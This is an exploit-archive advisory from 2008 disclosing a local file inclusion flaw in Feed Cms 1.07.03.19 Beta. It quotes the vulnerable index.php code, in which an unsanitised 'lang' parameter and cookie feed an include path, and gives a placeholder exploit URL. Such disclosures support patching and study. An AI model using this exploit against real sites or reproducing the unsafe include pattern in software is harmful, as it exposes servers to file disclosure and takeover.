[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability
# Published : 2008-12-11
# Author : x0r
# Previous Title : eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
# Next Title : Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability


###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: andry2000@hotmail.it
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php

if ($_GET['lang'])
{
	$language = $_GET['lang'];
	
	setcookie('firstlang',$language,time()+3600*240*365);
	header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");

LFI By Cookie ^ ^

Exploit: 

http://[site]/FeedCms/?lang=[LFI] ^ ^

Greetz: A Te Che Mi Hai Cambiato La Vita...

# www.Syue.com [2008-12-11]